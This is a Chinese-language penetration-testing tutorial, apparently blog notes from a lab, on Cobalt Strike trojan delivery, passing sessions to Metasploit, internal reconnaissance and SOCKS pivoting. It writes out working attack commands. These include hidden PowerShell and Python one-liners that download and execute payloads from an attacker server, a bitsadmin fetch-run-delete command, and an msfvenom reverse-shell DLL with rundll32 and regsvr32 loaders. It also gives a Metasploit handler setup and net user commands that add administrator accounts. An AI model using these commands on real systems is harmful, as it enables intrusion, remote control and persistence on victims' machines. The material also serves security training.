有阶段木马和无阶段木马的区别
有阶段木马
无阶段木马
有阶段:木马中不含完整的payload,木马文件比较小,需要发初始化包,下载payload,再发送心跳包(小 马拉大车)
无阶段:木马中包含完整的payload,木马文件比较大,不需要发初始化包,直接发送心跳包
cs木马的上线方式
exe木马文件上线
略...前文有
office宏病毒上线
hta上线
web传递上线
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.16.39:80/test1'))"
cmd.exe /c bitsadmin /transfer c7d2 http://192.168.16.39:80/test2 %APPDATA%\c7d2.exe&%APPDATA%\c7d2.exe&del %APPDATA%\c7d2.exe
#需要目标windows安装python2 python -c "import urllib2; exec urllib2.urlopen('http://192.168.16.39:80/test3').read();"
shellcode生成木马上线
DLL木马上线
msf生成dll文件,木马上线
msfvenom -p windows/meterpreter/reverse_tcp -a x86 -f dll LHOST=10.0.0.153 LPORT=6666 > reverse_32bit.dll
dll包含了一堆函数
rundll32.exe reverse_32bit.dll,re
regsvr32.exe reverse_32bit.dll
svchost.exe
结合metasploit,反弹shel
在kali中开启使用命令开启metasploit,结合kali来反弹shell,也是可以的,那为什么要结合msf呢,因 为msf的功能也很强大,主机提权、各种攻击载荷、漏洞攻击等
msfconsole
如下,可以使用xshell来玩
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 10.0.0.153
set lport 6666
run
然后在CS中创建监听器
使用Cobalt Strike创建一个windows/meterpreter/reverse_http的Listener。其中ip为Metasploit的ip地 址,端口为Metasploit所监听的端口。
然后选择增加会话
选择msf那个连接
然后再看msf,就成功了,我这里测试总是有点问题,后面再给大家补充最新的成功的图,流程没问题。
如果你发现在msf中输入指令没有效果,那么ctrl+c结束一下,然后通过sessions -i找到会话,继续通过 session -i id值,就可以了
也就是说,CS建立的连接会话可以派生到msf中,派生之后有个最大的有点就是,msf可以让这个会话在 后台运行,执行 background 指令,继续进行其他的攻击
cs的其他功能讲解
信息收集:
http://10.0.0.186:80/h1
智能攻击 applet攻击
自签名的applet攻击
网站克隆
文件下载
钓鱼邮件
cs自带的邮件钓鱼不好用,推荐使用Gophish邮件钓鱼平台
https://cloud.tencent.com/developer/article/1796781
cs的插件安装
内网渗透
内网渗透之信息收集
查看操作系统版本和补丁信息
win10
cmd中输入:systeminfo,系统信息和补丁信息都有
linux:centos7查看系统版本
cat /etc/redhat-release
查看内核版本
cat /proc/version uname -r
补丁情况:https://www.csdn.net/tags/NtzaggwsNjc0ODEtYmxvZwO0O0OO0O0O.html
系统查看用户和用户组
win10:
net user #查看所有账户
net user 用户名 #查看用户详细信息
net user 用户名 新密码 #给用户改密码(只有管理员可使用)
net user 用户名 密码 /add(/del) # 创建(删除)用户名和密码
net localgroup #列出所有组
net localgroup 组名 /add #新建组
net localgroup 组名 #查看该组成员
net localgroup administrators 用户名 /add(/del) # 把用户添加(把用户从组中删除)到 管理员组
net user 用户名 /active:yes #激活账户
net user 用户名 /active:no #禁用账户
linux:centos7
https://blog.csdn.net/erwange/article/details/104524602
useradd 用户名
userdel 用户名
usermod 用户名
cat /etc/passwd
lastlog
CS和msf配合做sock代理
先准备环境,需要准备三个虚拟机
kali在win2003上设置一个sock代理,用来访问win7。
首选给我们的win2003虚拟机再安装一个网卡
将第二个网卡单独划分一个网段中去
然后给第二张网卡设置ip地址,比如这是为10开头的地址
好,接下来将win7的网卡配置网段
给win7配置ip地址
那么此时win2003的第二张网卡和win7的网卡ip地址在同一个网段,互相能够ping通,kali和win2003的 第一张网卡在同一个网段,互相能够ping通,但是kali不能ping通win7的。
win7到win2003通畅:
win2003到win7通畅:
kali到win7,不通畅:
好,我们想让kali能够连通win7,那么就需要设置sock代理了
首先要先通过木马控制住win2003,这个我们已经会玩了,通过windows木马就能搞定,这里我就不演 示了,比如拿下的效果如下
第一步:设置代理端口
弹出如下窗口,默认即可,点击确定
第二步:查看已搭建代理
第三步:利用msf模块直接攻击
我们msf的扫描功能,如果能够扫描到10网段的,那么表示成功了
成功了之后,表示kali能够正常和目标主机连接了,那么就可以使用kali的攻击载荷进行攻击拉取shell 了